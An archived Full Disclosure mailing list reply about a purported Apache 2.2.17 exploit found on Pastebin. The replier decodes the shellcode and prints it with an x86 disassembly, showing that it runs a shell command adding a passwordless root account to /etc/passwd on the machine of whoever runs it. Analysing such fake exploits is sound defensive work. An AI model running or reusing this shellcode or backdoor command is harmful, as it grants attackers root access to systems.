Full Disclosure mailing list archives
Re: Apache 2.2.17 exploit?
From: nix () myproxylists com
Date: Mon, 3 Oct 2011 17:57:35 +0300
I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren
I decoded shellcode a bit. Looks quite trash to me. ë*^1À^ÈF^G^ÈF ^ÈFG^ÉvI^Í^^H^É^M^Í^^K^É^Q^ÉFU°^K^Éó^ÍNI^ÍVUÍ^ÀèÑÿÿÿ /bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD Here's disassembly: 0000000 EB2A jmp short 0x2c 00000002 5E pop esi 00000003 31C0 xor eax,eax 00000005 884607 mov [esi+0x7],al 00000008 88460A mov [esi+0xa],al 0000000B 884647 mov [esi+0x47],al 0000000E 897649 mov [esi+0x49],esi 00000011 8D5E08 lea ebx,[esi+0x8] 00000014 895E4D mov [esi+0x4d],ebx 00000017 8D5E0B lea ebx,[esi+0xb] 0000001A 895E51 mov [esi+0x51],ebx 0000001D 894655 mov [esi+0x55],eax 00000020 B00B mov al,0xb 00000022 89F3 mov ebx,esi 00000024 8D4E49 lea ecx,[esi+0x49] 00000027 8D5655 lea edx,[esi+0x55] 0000002A CD80 int 0x80 0000002C E8D1FFFFFF call dword 0x2 00000031 2F das 00000032 62696E bound ebp,[ecx+0x6e] 00000035 2F das 00000036 7368 jnc 0xa0 00000038 232D63232F62 and ebp,[dword 0x622f2363] 0000003E 696E2F6563686F imul ebp,[esi+0x2f],dword 0x6f686365 00000045 207730 and [edi+0x30],dh 00000048 3030 xor [eax],dh 0000004A 743A jz 0x86 0000004C 3A30 cmp dh,[eax] 0000004E 3A30 cmp dh,[eax] 00000050 3A7334 cmp dh,[ebx+0x34] 00000053 66656D gs insw 00000056 3064653A xor [ebp+0x3a],ah 0000005A 2F das 0000005B 726F jc 0xcc 0000005D 6F outsd 0000005E 743A jz 0x9a 00000060 2F das 00000061 62696E bound ebp,[ecx+0x6e] 00000064 2F das 00000065 626173 bound esp,[ecx+0x73] 00000068 68203E3E20 push dword 0x203e3e20 0000006D 2F das 0000006E 657463 gs jz 0xd4 00000071 2F das 00000072 7061 jo 0xd5 00000074 7373 jnc 0xe9 00000076 7764 ja 0xdc 00000078 234141 and eax,[ecx+0x41] 0000007B 41 inc ecx 0000007C 41 inc ecx 0000007D 42 inc edx 0000007E 42 inc edx 0000007F 42 inc edx 00000080 42 inc edx 00000081 43 inc ebx 00000082 43 inc ebx 00000083 43 inc ebx 00000084 43 inc ebx 00000085 44 inc esp 00000086 44 inc esp 00000087 44 inc esp 00000088 44 inc esp _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Apache 2.2.17 exploit?, (continued)
- Re: Apache 2.2.17 exploit? Vincent Degat (Oct 04)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? adam (Oct 03)
- Message not available
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 03)
- Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? dave bl (Oct 03)
- Re: Apache 2.2.17 exploit? Sergito (Oct 03)
- Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
- Re: Apache 2.2.17 exploit? adam (Oct 03)
- Re: Apache 2.2.17 exploit? PsychoBilly (Oct 03)
- Re: Apache 2.2.17 exploit? Darren Martyn (Oct 03)
- Re: Apache 2.2.17 exploit? adam (Oct 03)